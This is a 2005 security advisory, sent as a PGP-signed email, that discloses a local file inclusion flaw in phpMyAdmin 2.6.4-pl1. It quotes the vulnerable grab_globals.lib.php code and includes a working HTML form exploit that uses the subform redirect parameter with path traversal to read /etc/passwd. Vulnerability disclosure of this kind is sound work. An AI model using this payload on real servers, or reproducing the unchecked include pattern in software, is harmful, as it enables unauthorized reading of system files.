--Boundary-00=_A/oSDPpggmc0vcj Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpMyAdmin Local file inclusion 2.6.4-pl1] Author: Maksymilian Arciemowicz ( cXIb8O3 ).18 Date: 10.10.2005 from SECURITYREASON.COM - --- 0.Description --- phpMyAdmin 2.6.4 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. blablabla... phpMyAdmin is very dangerous script. - --- 1. Local file inclusion (Critical) --- File: ./libraries/grab_globals.lib.php This file is included by many files. Example file index.php - -index.php--

File

- -Exploit--- Exploit: http://securityreason.com/achievement_exploitalert/2 - --- 2. Greets --- sp3x - --- 3.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg WWW: http://securityreason.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T cvqCRiRlK9XrQGvV3sYxzXQ= =yoDY -----END PGP SIGNATURE----- --Boundary-00=_A/oSDPpggmc0vcj Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

[phpMyAdmin Local file inclusion 2.6.4-pl1]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).18

Date: 10.10.2005

from SECURITYREASON.COM

- --- 0.Description ---

phpMyAdmin 2.6.4 is a tool written in PHP intended to

handle the administration of MySQL over the Web.

Currently it can create and drop databases,

create/drop/alter tables, delete/edit/add fields,

execute any SQL statement, manage keys on fields.

blablabla...

phpMyAdmin is very dangerous script.

- --- 1. Local file inclusion (Critical) ---

File: ./libraries/grab_globals.lib.php

This file is included by many files. Example file index.php

- -index.php--

<?php

/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */

// vim: expandtab sw=4 ts=4 sts=4:

/**

* Gets core libraries and defines some variables

*/

require_once('./libraries/grab_globals.lib.php');

require_once('./libraries/common.lib.php');

...

- -index.php--

ok so. In ./libraries/grab_globals.lib.php we have:

- -101-104-grab_globals.lib.php---------

if ( ! empty( $__redirect ) ) {

require('./' . $__redirect);

exit();

} // end if ( ! empty( $__redirect ) )

- -101-104-grab_globals.lib.php---------

But before we have

- -53-67-grab_globals.lib.php-----------

// check if a subform is submitted

$__redirect = NULL;

if ( isset( $_POST['usesubform'] ) ) {

// if a subform is present and should be used

// the rest of the form is deprecated

$subform_id = key( $_POST['usesubform'] );

$subform = $_POST['subform'][$subform_id];

$_POST = $subform;

if ( isset( $_POST['redirect'] )

&& $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {

$__redirect = $_POST['redirect'];

unset( $_POST['redirect'] );

} // end if ( isset( $_POST['redirect'] ) )

} // end if ( isset( $_POST['usesubform'] ) )

// end check if a subform is submitted

- -53-67-grab_globals.lib.php-----------

If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).

$subform = $_POST['subform'][$subform_id];

$_POST = $subform;

where array $_POST = array $_POST[subform][1]

that

$_POST['redirect']=$_POST[subform][1][redirect]

and we have local file inclusion.

Example response in html:

- -Exploit---

<CENTER>

<A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>

<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data">

<input TYPE="hidden" name="usesubform[1]" value="1">

<input TYPE="hidden" name="usesubform[2]" value="1">

<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>

<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">

<input TYPE="submit" value="Exploit">

</FORM>

- -Exploit---

Exploit:

http://securityreason.com/achievement_exploitalert/2

- --- 2. Greets ---

sp3x

- --- 3.Contact ---

Author: Maksymilian Arciemowicz < cXIb8O3 >

Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com

GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

WWW: http://securityreason.com

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T

cvqCRiRlK9XrQGvV3sYxzXQ=

=yoDY

-----END PGP SIGNATURE-----

--Boundary-00=_A/oSDPpggmc0vcj--